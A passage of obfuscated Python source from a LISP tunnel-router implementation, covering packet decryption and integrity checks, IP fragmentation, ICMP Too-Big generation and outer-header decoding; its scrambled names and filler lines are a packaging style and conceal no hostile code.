if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
i1I = 8
II1Iiiii111i = bold ( "chacha" , False )
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
i1I = 12
II1Iiiii111i = bold ( "aes-gcm" , False )
else :
i1I = 16
II1Iiiii111i = bold ( "aes-cbc" , False )
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
iI1ii = packet [ 0 : i1I ]
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
if 34 - 34: I1IiiI
o0OoOo0O00 = key . do_icv ( oOoOO0O00o + packet , iI1ii )
if 9 - 9: OOooOOo
I1iII = "0x{}...{}" . format ( oo00o000O [ 0 : III1i1IIII1i ] , oo00o000O [ - III1i1IIII1i : : ] )
I1IIiIi = "0x{}...{}" . format ( o0OoOo0O00 [ 0 : III1i1IIII1i ] , o0OoOo0O00 [ - III1i1IIII1i : : ] )
if 93 - 93: oO0o - OOooOOo + o0oOOo0O0Ooo . oO0o / I11i
if ( o0OoOo0O00 != oo00o000O ) :
self . packet_error = "ICV-error"
o0000oO = II1Iiiii111i + "/" + OooO0o
ooo0oo = bold ( "ICV failed ({})" . format ( o0000oO ) , False )
OOoo00o00O0o0 = "packet-ICV {} != computed-ICV {}" . format ( I1iII , I1IIiIi )
dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( ooo0oo , red ( addr_str , False ) ,
# I1IiiI - OoOoOO00 . Oo0Ooo . i1IIi - oO0o
self . udp_sport , key . key_id , OOoo00o00O0o0 ) )
dprint ( "{}" . format ( key . print_keys ( ) ) )
if 93 - 93: IiII % I1ii11iIi11i
if 31 - 31: II111iiii + OOooOOo - OoooooooOO . I11i
if 28 - 28: Ii1I . I1ii11iIi11i
if 77 - 77: I1ii11iIi11i % II111iiii
if 81 - 81: OoOoOO00 % Ii1I / O0 * iIii1I11I1II1 % IiII . I1IiiI
if 90 - 90: o0oOOo0O0Ooo
lisp_retry_decap_keys ( addr_str , oOoOO0O00o + packet , iI1ii , oo00o000O )
return ( [ None , False ] )
if 44 - 44: o0oOOo0O0Ooo / I1ii11iIi11i . Oo0Ooo + OoOoOO00
if 32 - 32: IiII - ooOoO0o * iII111i * I11i
if 84 - 84: Ii1I + I1ii11iIi11i % I1IiiI + i11iIiiIii
if 37 - 37: I11i % I1ii11iIi11i / ooOoO0o
if 94 - 94: I11i / OoO0O00 . o0oOOo0O0Ooo
packet = packet [ i1I : : ]
if 1 - 1: Oo0Ooo . II111iiii
if 93 - 93: II111iiii . i11iIiiIii + II111iiii % oO0o
if 98 - 98: I1Ii111 * oO0o * OoOoOO00 + Ii1I * iII111i
if 4 - 4: IiII
i1 = lisp_get_timestamp ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
IiI1iIiiI1iI = chacha . ChaCha ( key . encrypt_key , iI1ii ) . decrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
I11IIIIiI1 = binascii . unhexlify ( key . encrypt_key )
try :
IiI1iIiiI1iI = AES . new ( I11IIIIiI1 , AES . MODE_GCM , iI1ii ) . decrypt
except :
self . packet_error = "no-decrypt-key"
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ None , False ] )
if 2 - 2: I1IiiI * I1Ii111 % I1Ii111 - I1Ii111 - iII111i + OOooOOo
else :
if ( ( len ( packet ) % 16 ) != 0 ) :
dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
return ( [ None , False ] )
if 7 - 7: I11i - OoO0O00 . OoooooooOO / OoooooooOO - I11i
I11IIIIiI1 = binascii . unhexlify ( key . encrypt_key )
IiI1iIiiI1iI = AES . new ( I11IIIIiI1 , AES . MODE_CBC , iI1ii ) . decrypt
if 84 - 84: II111iiii
if 36 - 36: OOooOOo - OoOoOO00 - iIii1I11I1II1
II11 = IiI1iIiiI1iI ( packet )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 79 - 79: O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
if 4 - 4: o0oOOo0O0Ooo + I11i / iII111i + i1IIi % o0oOOo0O0Ooo % iII111i
Oo0OOOOOOO0oo = bold ( "Decrypt" , False )
addr_str = "RLOC: " + red ( addr_str , False )
OooooO0o0 = "poly" if key . do_poly else "sha256"
OooooO0o0 = bold ( OooooO0o0 , False )
OOoo00o00O0o0 = "ICV({}): {}" . format ( OooooO0o0 , I1iII )
dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( Oo0OOOOOOO0oo , key . key_id , addr_str , OOoo00o00O0o0 , II1Iiiii111i , i1 ) )
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i . oO0o
if 87 - 87: OoO0O00
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
self . packet = self . packet [ 0 : header_length ]
return ( [ II11 , True ] )
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
if 46 - 46: i11iIiiIii
def fragment_outer ( self , outer_hdr , inner_packet ) :
Iiiii = 1000
if 25 - 25: Oo0Ooo * I1IiiI + OOooOOo + I1Ii111 % OOooOOo
if 84 - 84: O0 % Ii1I . Ii1I . iII111i * I11i
if 43 - 43: OoOoOO00 . I1ii11iIi11i % i1IIi
if 61 - 61: I1IiiI + oO0o % I1Ii111 % iIii1I11I1II1 - OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
oOo00Oo0o00oo = [ ]
IiI1ii1Ii = 0
iI = len ( inner_packet )
while ( IiI1ii1Ii < iI ) :
oo0O00o0O0Oo = inner_packet [ IiI1ii1Ii : : ]
if ( len ( oo0O00o0O0Oo ) > Iiiii ) : oo0O00o0O0Oo = oo0O00o0O0Oo [ 0 : Iiiii ]
oOo00Oo0o00oo . append ( oo0O00o0O0Oo )
IiI1ii1Ii += len ( oo0O00o0O0Oo )
if 58 - 58: OoOoOO00 + OoO0O00 * Ii1I
if 31 - 31: oO0o - iII111i
if 46 - 46: I1IiiI + Oo0Ooo - Ii1I
if 99 - 99: OOooOOo + I1IiiI . I1ii11iIi11i * OoooooooOO
if 82 - 82: i11iIiiIii + iIii1I11I1II1 / Oo0Ooo + OOooOOo * II111iiii
if 34 - 34: o0oOOo0O0Ooo % OoooooooOO
iIIIi = [ ]
IiI1ii1Ii = 0
for oo0O00o0O0Oo in oOo00Oo0o00oo :
if 74 - 74: O0 . I11i
if 64 - 64: ooOoO0o / i1IIi % iII111i
if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
if 99 - 99: I1Ii111
o0I1IiiiiI1i1I = IiI1ii1Ii if ( oo0O00o0O0Oo == oOo00Oo0o00oo [ - 1 ] ) else 0x2000 + IiI1ii1Ii
o0I1IiiiiI1i1I = socket . htons ( o0I1IiiiiI1i1I )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , o0I1IiiiiI1i1I ) + outer_hdr [ 8 : : ]
if 48 - 48: I11i + II111iiii % oO0o % OOooOOo * II111iiii
if 41 - 41: OoO0O00
if 13 - 13: ooOoO0o - I1IiiI
if 23 - 23: I1IiiI
i1IIiI1iII = socket . htons ( len ( oo0O00o0O0Oo ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , i1IIiI1iII ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
iIIIi . append ( outer_hdr + oo0O00o0O0Oo )
IiI1ii1Ii += len ( oo0O00o0O0Oo ) / 8
if 45 - 45: i1IIi % OOooOOo % II111iiii
return ( iIIIi )
if 4 - 4: oO0o * I1IiiI - ooOoO0o / II111iiii + OOooOOo / i11iIiiIii
if 63 - 63: OoO0O00 + ooOoO0o
def send_icmp_too_big ( self , inner_packet ) :
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
if 3 - 3: OoOoOO00 - I1Ii111 / oO0o . O0 * ooOoO0o / I1ii11iIi11i
Ii1i1 = time . time ( ) - lisp_last_icmp_too_big_sent
if ( Ii1i1 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
if 18 - 18: Ii1I
return ( False )
if 74 - 74: Ii1I + I1ii11iIi11i + I1IiiI
if 37 - 37: IiII
if 97 - 97: o0oOOo0O0Ooo / IiII + OoOoOO00 + OoO0O00 % I1Ii111
if 18 - 18: I1IiiI - OoOoOO00
if 18 - 18: OOooOOo + OoO0O00 * oO0o - oO0o . I1ii11iIi11i * I11i
if 95 - 95: I1ii11iIi11i / OoOoOO00
if 10 - 10: IiII % I1ii11iIi11i - IiII
if 86 - 86: Oo0Ooo
if 88 - 88: I1Ii111 * I1IiiI
if 30 - 30: OoOoOO00 / oO0o / Ii1I * o0oOOo0O0Ooo * oO0o . I1IiiI
if 93 - 93: OoOoOO00
if 97 - 97: i11iIiiIii
if 68 - 68: IiII * OoO0O00 . I11i / Ii1I . o0oOOo0O0Ooo - i11iIiiIii
if 49 - 49: Oo0Ooo / Ii1I % I11i + oO0o - OoO0O00
if 13 - 13: II111iiii
OoO = socket . htons ( 1400 )
O0OO0ooO00 = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , OoO )
O0OO0ooO00 += inner_packet [ 0 : 20 + 8 ]
O0OO0ooO00 = lisp_icmp_checksum ( O0OO0ooO00 )
if 34 - 34: i1IIi % oO0o . IiII . i1IIi + II111iiii / OoO0O00
if 79 - 79: I1ii11iIi11i - iIii1I11I1II1 % i1IIi / Oo0Ooo + II111iiii
if 95 - 95: oO0o
if 48 - 48: I11i / iIii1I11I1II1 % II111iiii
if 39 - 39: i1IIi . I1ii11iIi11i / I11i / I11i
if 100 - 100: OoooooooOO - OoooooooOO + IiII
if 32 - 32: OoOoOO00 * o0oOOo0O0Ooo / OoooooooOO
oOooo00OOO000 = inner_packet [ 12 : 16 ]
OooOOooo = self . inner_source . print_address_no_iid ( )
O00oOoo00O = self . outer_source . pack_address ( )
if 25 - 25: i11iIiiIii + I1ii11iIi11i - OoooooooOO . O0 % I1Ii111
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo + I1IiiI % OoooooooOO - iIii1I11I1II1
if 9 - 9: i1IIi - OoOoOO00
if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
if 46 - 46: Ii1I
if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
if 87 - 87: I1ii11iIi11i / I1IiiI
o000o0o00Oo = socket . htons ( 20 + 36 )
o0OO00oo0O = struct . pack ( "BBHHHBBH" , 0x45 , 0 , o000o0o00Oo , 0 , 0 , 32 , 1 , 0 ) + O00oOoo00O + oOooo00OOO000
o0OO00oo0O = lisp_ip_checksum ( o0OO00oo0O )
o0OO00oo0O = self . fix_outer_header ( o0OO00oo0O )
o0OO00oo0O += O0OO0ooO00
IIi1IiiIi1III = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( IIi1IiiIi1III , OooOOooo ,
lisp_format_packet ( o0OO00oo0O ) ) )
if 19 - 19: i1IIi % I1IiiI - iIii1I11I1II1 - oO0o / I1ii11iIi11i
try :
lisp_icmp_raw_socket . sendto ( o0OO00oo0O , ( OooOOooo , 0 ) )
except socket . error as I1i :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( I1i ) )
return ( False )
if 16 - 16: Ii1I
if 79 - 79: OoooooooOO - ooOoO0o * Ii1I - II111iiii % OoOoOO00 * IiII
if 31 - 31: I1IiiI
if 36 - 36: OoO0O00 + OoO0O00 + OoO0O00 % Oo0Ooo * iII111i
if 98 - 98: I11i . I11i / Oo0Ooo / Ii1I / I1IiiI
if 56 - 56: o0oOOo0O0Ooo / IiII
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
if 11 - 11: OoOoOO00 / I11i
def fragment ( self ) :
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
if 47 - 47: OOooOOo . I1Ii111 % II111iiii + Oo0Ooo - oO0o . II111iiii
OO0Oo00OO0oo = self . fix_outer_header ( self . packet )
if 37 - 37: iIii1I11I1II1 . I1IiiI % OoO0O00 % OoooooooOO . OoooooooOO / O0
if 25 - 25: II111iiii % II111iiii - Ii1I . O0
if 79 - 79: IiII / OoO0O00 * OoooooooOO * OoOoOO00 + I1IiiI
if 68 - 68: I11i / iIii1I11I1II1 . Oo0Ooo + i11iIiiIii + o0oOOo0O0Ooo
if 92 - 92: OoO0O00 . o0oOOo0O0Ooo . Ii1I % OoOoOO00
if 58 - 58: I1ii11iIi11i % Ii1I * Ii1I - iII111i
iI = len ( OO0Oo00OO0oo )
if ( iI <= 1500 ) : return ( [ OO0Oo00OO0oo ] , "Fragment-None" )
if 9 - 9: ooOoO0o - Ii1I % II111iiii + IiII + OOooOOo % O0
OO0Oo00OO0oo = self . packet
if 65 - 65: OOooOOo - OoO0O00 % i11iIiiIii
if 58 - 58: iII111i
if 2 - 2: II111iiii + i1IIi
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if ( self . inner_version != 4 ) :
i11I1iiii = random . randint ( 0 , 0xffff )
i1iIi = OO0Oo00OO0oo [ 0 : 4 ] + struct . pack ( "H" , i11I1iiii ) + OO0Oo00OO0oo [ 6 : 20 ]
oOO00OOOoO0o = OO0Oo00OO0oo [ 20 : : ]
iIIIi = self . fragment_outer ( i1iIi , oOO00OOOoO0o )
return ( iIIIi , "Fragment-Outer" )
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
Ii1o0OOOoo0000 = 56 if ( self . outer_version == 6 ) else 36
i1iIi = OO0Oo00OO0oo [ 0 : Ii1o0OOOoo0000 ]
IiIIii1i1i11iII = OO0Oo00OO0oo [ Ii1o0OOOoo0000 : Ii1o0OOOoo0000 + 20 ]
oOO00OOOoO0o = OO0Oo00OO0oo [ Ii1o0OOOoo0000 + 20 : : ]
if 53 - 53: i11iIiiIii
if 90 - 90: ooOoO0o
if 12 - 12: IiII * iIii1I11I1II1 - oO0o
if 64 - 64: I1Ii111 + iIii1I11I1II1
if 66 - 66: I11i - I11i + IiII
i1i = struct . unpack ( "H" , IiIIii1i1i11iII [ 6 : 8 ] ) [ 0 ]
i1i = socket . ntohs ( i1i )
if ( i1i & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
i1iiiI = OO0Oo00OO0oo [ Ii1o0OOOoo0000 : : ]
if ( self . send_icmp_too_big ( i1iiiI ) ) : return ( [ ] , None )
if 33 - 33: o0oOOo0O0Ooo % IiII - iIii1I11I1II1 % OOooOOo + I1Ii111 - i11iIiiIii
if ( lisp_ignore_df_bit ) :
i1i &= ~ 0x4000
else :
ooi1 = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( ooi1 ) )
return ( [ ] , "Fragment-None-DF-bit" )
if 17 - 17: OoOoOO00 - I1IiiI
if 63 - 63: OoOoOO00 - oO0o / iIii1I11I1II1 - Ii1I / I1Ii111
if 34 - 34: iII111i / o0oOOo0O0Ooo + OOooOOo - o0oOOo0O0Ooo + Oo0Ooo . oO0o
IiI1ii1Ii = 0
iI = len ( oOO00OOOoO0o )
iIIIi = [ ]
while ( IiI1ii1Ii < iI ) :
iIIIi . append ( oOO00OOOoO0o [ IiI1ii1Ii : IiI1ii1Ii + 1400 ] )
IiI1ii1Ii += 1400
if 97 - 97: i1IIi
if 46 - 46: I1ii11iIi11i
if 30 - 30: OoO0O00 / O0 * o0oOOo0O0Ooo * I1Ii111 + OoooooooOO * iII111i
if 23 - 23: I11i
if 36 - 36: IiII . iII111i - i1IIi + I1Ii111
oOo00Oo0o00oo = iIIIi
iIIIi = [ ]
ooOOo0O0o00o00 = True if i1i & 0x2000 else False
i1i = ( i1i & 0x1fff ) * 8
for oo0O00o0O0Oo in oOo00Oo0o00oo :
if 90 - 90: I1Ii111 . II111iiii . I1ii11iIi11i
if 32 - 32: ooOoO0o - OoO0O00 . iII111i . iII111i % i1IIi * Ii1I
if 65 - 65: iII111i / ooOoO0o . II111iiii
if 90 - 90: I11i
o00oooo = old_div ( i1i , 8 )
if ( ooOOo0O0o00o00 ) :
o00oooo |= 0x2000
elif ( oo0O00o0O0Oo != oOo00Oo0o00oo [ - 1 ] ) :
o00oooo |= 0x2000
if 63 - 63: II111iiii - I11i . OoOoOO00
o00oooo = socket . htons ( o00oooo )
IiIIii1i1i11iII = IiIIii1i1i11iII [ 0 : 6 ] + struct . pack ( "H" , o00oooo ) + IiIIii1i1i11iII [ 8 : : ]
if 8 - 8: I1IiiI * ooOoO0o / IiII + OoOoOO00 . IiII - OOooOOo
if 80 - 80: iIii1I11I1II1 / oO0o * Oo0Ooo - OOooOOo * iII111i
if 97 - 97: IiII - I11i / II111iiii
if 26 - 26: iII111i + O0 * iII111i . i1IIi
if 50 - 50: iIii1I11I1II1 - I11i % iII111i - Oo0Ooo
if 52 - 52: oO0o + Ii1I - I1ii11iIi11i * Ii1I . OOooOOo + I1Ii111
iI = len ( oo0O00o0O0Oo )
i1i += iI
i1IIiI1iII = socket . htons ( iI + 20 )
IiIIii1i1i11iII = IiIIii1i1i11iII [ 0 : 2 ] + struct . pack ( "H" , i1IIiI1iII ) + IiIIii1i1i11iII [ 4 : 10 ] + struct . pack ( "H" , 0 ) + IiIIii1i1i11iII [ 12 : : ]
if 43 - 43: I1IiiI % IiII % I1ii11iIi11i
IiIIii1i1i11iII = lisp_ip_checksum ( IiIIii1i1i11iII )
OO00oOo0o00 = IiIIii1i1i11iII + oo0O00o0O0Oo
if 73 - 73: iII111i / ooOoO0o + OoO0O00 / OoOoOO00 . II111iiii * Ii1I
if 21 - 21: I1IiiI - I1IiiI + iII111i % I1IiiI * oO0o
if 74 - 74: iII111i / I11i . I1IiiI - OoooooooOO + II111iiii + I11i
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
iI = len ( OO00oOo0o00 )
if ( self . outer_version == 4 ) :
i1IIiI1iII = iI + Ii1o0OOOoo0000
iI += 16
i1iIi = i1iIi [ 0 : 2 ] + struct . pack ( "H" , i1IIiI1iII ) + i1iIi [ 4 : : ]
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
i1iIi = lisp_ip_checksum ( i1iIi )
OO00oOo0o00 = i1iIi + OO00oOo0o00
OO00oOo0o00 = self . fix_outer_header ( OO00oOo0o00 )
if 9 - 9: i11iIiiIii + OOooOOo - OoOoOO00 / ooOoO0o % i1IIi / oO0o
if 22 - 22: i1IIi
if 3 - 3: OoO0O00 * I1ii11iIi11i - iII111i + I1ii11iIi11i
if 63 - 63: I11i * ooOoO0o % II111iiii % I1Ii111 + I1IiiI * Oo0Ooo
if 96 - 96: IiII
oo00OOo0 = Ii1o0OOOoo0000 - 12
i1IIiI1iII = socket . htons ( iI )
OO00oOo0o00 = OO00oOo0o00 [ 0 : oo00OOo0 ] + struct . pack ( "H" , i1IIiI1iII ) + OO00oOo0o00 [ oo00OOo0 + 2 : : ]
if 61 - 61: oO0o % ooOoO0o - I1ii11iIi11i + oO0o . OoOoOO00
iIIIi . append ( OO00oOo0o00 )
if 44 - 44: I1ii11iIi11i / O0 - IiII + OOooOOo . I11i . I1ii11iIi11i
return ( iIIIi , "Fragment-Inner" )
if 95 - 95: OoOoOO00 % I1Ii111 % i1IIi * o0oOOo0O0Ooo + OOooOOo
if 34 - 34: I1Ii111 * o0oOOo0O0Ooo . I1IiiI % i11iIiiIii
def fix_outer_header ( self , packet ) :
if 61 - 61: iIii1I11I1II1 + oO0o * I11i - i1IIi % oO0o
if 76 - 76: oO0o / OoOoOO00
if 12 - 12: I1Ii111
if 58 - 58: OoO0O00 + iIii1I11I1II1 % O0 + I11i + OoOoOO00 * OoooooooOO
if 41 - 41: oO0o * I1IiiI
if 76 - 76: oO0o . O0 * OoooooooOO + ooOoO0o
if 53 - 53: Oo0Ooo
if 3 - 3: IiII - OoooooooOO * OoooooooOO - I1IiiI / I1Ii111 * I1ii11iIi11i
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 : 4 ] + packet [ 2 : 3 ] + packet [ 4 : 6 ] + packet [ 7 : 8 ] + packet [ 6 : 7 ] + packet [ 8 : : ]
if 58 - 58: IiII % iIii1I11I1II1 / i11iIiiIii % o0oOOo0O0Ooo . I1Ii111 * iII111i
else :
packet = packet [ 0 : 2 ] + packet [ 3 : 4 ] + packet [ 2 : 3 ] + packet [ 4 : : ]
if 32 - 32: OoooooooOO + o0oOOo0O0Ooo
if 91 - 91: ooOoO0o - I1Ii111 * I1Ii111
return ( packet )
if 55 - 55: iIii1I11I1II1 + I1IiiI - Oo0Ooo
if 24 - 24: OoO0O00 / I1Ii111 + iII111i * I11i * iII111i
def send_packet ( self , lisp_raw_socket , dest ) :
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
if 10 - 10: I1IiiI - I1ii11iIi11i - Oo0Ooo - o0oOOo0O0Ooo
dest = dest . print_address_no_iid ( )
iIIIi , ii1IIii = self . fragment ( )
if 11 - 11: I1IiiI - Ii1I * OOooOOo % o0oOOo0O0Ooo
for OO00oOo0o00 in iIIIi :
if ( len ( iIIIi ) != 1 ) :
self . packet = OO00oOo0o00
self . print_packet ( ii1IIii , True )
if 5 - 5: I1ii11iIi11i / o0oOOo0O0Ooo * I11i - i11iIiiIii - OoooooooOO / ooOoO0o
if 6 - 6: I11i * OoooooooOO - OOooOOo + O0 * I1Ii111
try : lisp_raw_socket . sendto ( OO00oOo0o00 , ( dest , 0 ) )
except socket . error as I1i :
lprint ( "socket.sendto() failed: {}" . format ( I1i ) )
if 90 - 90: i1IIi . oO0o / I1Ii111 . OOooOOo / I1Ii111
if 1 - 1: iII111i % ooOoO0o
if 99 - 99: iII111i + iIii1I11I1II1 . OOooOOo / OoO0O00 * I1ii11iIi11i
if 87 - 87: IiII / II111iiii % OoO0O00 % OoO0O00
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if 28 - 28: OoOoOO00 % oO0o - OOooOOo + OOooOOo + oO0o / iIii1I11I1II1
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
if 91 - 91: I1IiiI / II111iiii * OOooOOo
if 94 - 94: II111iiii - iIii1I11I1II1 - iIii1I11I1II1
OO0Oo00OO0oo = mac_header + self . packet
if 83 - 83: I1ii11iIi11i * iIii1I11I1II1 + OoOoOO00 * i1IIi . OoooooooOO % Ii1I
if 81 - 81: OoO0O00 - iIii1I11I1II1
if 60 - 60: I1Ii111
if 77 - 77: I1IiiI / I1ii11iIi11i
if 95 - 95: I1Ii111 * i1IIi + oO0o
if 40 - 40: II111iiii
if 7 - 7: OOooOOo / OoO0O00
if 88 - 88: i1IIi
if 53 - 53: ooOoO0o . OOooOOo . o0oOOo0O0Ooo + oO0o
if 17 - 17: iIii1I11I1II1 + i1IIi . I1ii11iIi11i + Ii1I % i1IIi . oO0o
if 57 - 57: oO0o
l2_socket . write ( OO0Oo00OO0oo )
return
if 92 - 92: II111iiii - OoO0O00 - OOooOOo % I1IiiI - OoOoOO00 * I1Ii111
if 16 - 16: iIii1I11I1II1 + OoooooooOO - ooOoO0o * IiII
def bridge_l2_packet ( self , eid , db ) :
try : iiI1IiI1I1I = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : i1i1111I = lisp_myinterfaces [ iiI1IiI1I1I . interface ]
except : return
try :
socket = i1i1111I . get_bridge_socket ( )
if ( socket == None ) : return
except : return
if 42 - 42: Oo0Ooo + I1IiiI + I11i + i1IIi / OoooooooOO
try : socket . send ( self . packet )
except socket . error as I1i :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( I1i ) )
if 20 - 20: oO0o - o0oOOo0O0Ooo * OoO0O00 % i1IIi - iIii1I11I1II1 . OOooOOo
if 31 - 31: oO0o % i1IIi . OoooooooOO - o0oOOo0O0Ooo + OoooooooOO
if 45 - 45: OOooOOo + I11i / OoooooooOO - Ii1I + OoooooooOO
def is_lisp_packet ( self , packet ) :
Ii1iiI1 = ( struct . unpack ( "B" , packet [ 9 : 10 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( Ii1iiI1 == False ) : return ( False )
if 42 - 42: iIii1I11I1II1 * I1IiiI * I1Ii111
O00oo0o0o0oo = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( O00oo0o0o0oo ) == LISP_DATA_PORT ) : return ( True )
O00oo0o0o0oo = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( O00oo0o0o0oo ) == LISP_DATA_PORT ) : return ( True )
return ( False )
if 22 - 22: I1Ii111 + iII111i - I11i + iIii1I11I1II1 / I1Ii111 - OoooooooOO
if 42 - 42: OoooooooOO - OoOoOO00 - OOooOOo * I1Ii111
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
self . packet_error = ""
OO0Oo00OO0oo = self . packet
OO0 = len ( OO0Oo00OO0oo )
iii111 = o00O000oooOo = True
if 100 - 100: ooOoO0o % I11i / O0 * Ii1I - i11iIiiIii
if 90 - 90: IiII / II111iiii / o0oOOo0O0Ooo
if 92 - 92: O0 * I1IiiI / OoO0O00
if 44 - 44: I11i
oO = 0
i1oO00O = self . lisp_header . get_instance_id ( )
if ( is_lisp_packet ) :
I1iI1Ii11 = struct . unpack ( "B" , OO0Oo00OO0oo [ 0 : 1 ] ) [ 0 ]
self . outer_version = I1iI1Ii11 >> 4
if ( self . outer_version == 4 ) :
if 34 - 34: Ii1I * I1IiiI + I11i * OoOoOO00 - II111iiii
if 92 - 92: OOooOOo . o0oOOo0O0Ooo / iII111i . iIii1I11I1II1 % Oo0Ooo . OoooooooOO
if 81 - 81: i11iIiiIii * iII111i . oO0o * oO0o . IiII
if 47 - 47: iIii1I11I1II1 % I11i . I11i / O0 . i11iIiiIii * Ii1I
if 24 - 24: O0
Ii1Iii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 10 : 12 ] ) [ 0 ]
OO0Oo00OO0oo = lisp_ip_checksum ( OO0Oo00OO0oo )
OOOoOOo0o = struct . unpack ( "H" , OO0Oo00OO0oo [ 10 : 12 ] ) [ 0 ]
if ( OOOoOOo0o != 0 ) :
if ( Ii1Iii1 != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( OO0 )
if 87 - 87: OoooooooOO
if 1 - 1: iIii1I11I1II1 / o0oOOo0O0Ooo
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 98 - 98: O0 % I1IiiI / OoooooooOO * I1ii11iIi11i - oO0o
if 51 - 51: iII111i + I11i
if 54 - 54: II111iiii * O0 % I1IiiI . I11i
O0ooO0O00oo0 = LISP_AFI_IPV4
IiI1ii1Ii = 12
self . outer_tos = struct . unpack ( "B" , OO0Oo00OO0oo [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , OO0Oo00OO0oo [ 8 : 9 ] ) [ 0 ]
oO = 20
elif ( self . outer_version == 6 ) :
O0ooO0O00oo0 = LISP_AFI_IPV6
IiI1ii1Ii = 8
II1i1iI = struct . unpack ( "H" , OO0Oo00OO0oo [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( II1i1iI ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , OO0Oo00OO0oo [ 7 : 8 ] ) [ 0 ]
oO = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
lprint ( "Cannot decode outer header" )
return ( None )
if 5 - 5: OoOoOO00 + iII111i * ooOoO0o
if 47 - 47: iIii1I11I1II1 + OoO0O00 % iIii1I11I1II1 . ooOoO0o / Oo0Ooo - i11iIiiIii
self . outer_source . afi = O0ooO0O00oo0
self . outer_dest . afi = O0ooO0O00oo0
OOoo = self . outer_source . addr_length ( )
if 40 - 40: I1IiiI
self . outer_source . unpack_address ( OO0Oo00OO0oo [ IiI1ii1Ii : IiI1ii1Ii + OOoo ] )
IiI1ii1Ii += OOoo
self . outer_dest . unpack_address ( OO0Oo00OO0oo [ IiI1ii1Ii : IiI1ii1Ii + OOoo ] )
OO0Oo00OO0oo = OO0Oo00OO0oo [ oO : : ]
